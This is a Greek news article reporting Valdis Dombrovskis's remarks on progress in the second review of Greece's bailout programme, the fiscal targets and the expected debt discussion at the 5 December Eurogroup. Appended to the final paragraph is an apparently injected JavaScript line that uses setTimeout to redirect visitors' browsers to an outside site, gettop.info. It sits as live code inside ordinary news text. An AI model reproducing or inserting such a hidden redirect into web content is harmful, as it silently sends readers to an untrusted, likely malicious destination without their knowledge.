Ντομπρόβσκις: Συμφωνία στο «προβλεπόμενο μέλλον»

0
7

 

Σημαντική πρόοδος έχει σημειωθεί ενώ «μπορούμε να αναμένουμε την ολοκλήρωση της δεύτερης αξιολόγησης του ελληνικού προγράμματος στο ορατό μέλλον», δήλωσε ο αντιπρόεδρος της Επιτροπής, αρμόδιος για θέματα ευρώ, Βάλντις Ντομπρόβσκις από τις Βρυξέλλες.

Κατά τη διάρκεια συνέντευξης Τύπου, ο κ. Ντομπρόβσκις αναφέρθηκε στις πιθανότητες ολοκλήρωσης της δεύτερης αξιολόγησης πριν από το Eurogroup της 5ης Δεκεμβρίου τονίζοντας ότι δεν μπορεί να κάνει προβλέψεις για το πότε ακριβώς μπορεί αυτό να συμβεί, ωστόσο τόνισε ότι η δουλειά μεταξύ των θεσμών και των ελληνικών αρχών προχωράει και τα πράγματα είναι στη «σωστή τροχιά».

Ο ίδιος σημείωσε ότι η Επιτροπή συνεργάζεται στενά με τις ελληνικές Αρχές, στο πλαίσιο της δεύτερης αξιολόγησης, υπογραμμίζοντας ότι έχει επιτευχθεί «σημαντική πρόοδος».Επίσης, συμπλήρωσε ότι η Επιτροπή αξιολογεί τα δημοσιονομικά μέτρα για το 2017 και 2018, προκειμένου να επιτευχθεί ο μεσοπρόθεσμος στόχος για πρωτογενές πλεόνασμα στο 3,5% του ΑΕΠ.

Σχετικά με το σκέλος των διαρθρωτικών μεταρρυθμίσεων, ανέφερε ότι οι συνομιλίες συνεχίζονται με τις μεταρρυθμίσεις στην αγορά εργασίας κι επίσης σημείωσε ότι στο Eurogroup της 5ης Δεκεμβρίου αναμένεται να συζητηθούν κάποια μέτρα για το ελληνικό χρέος. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here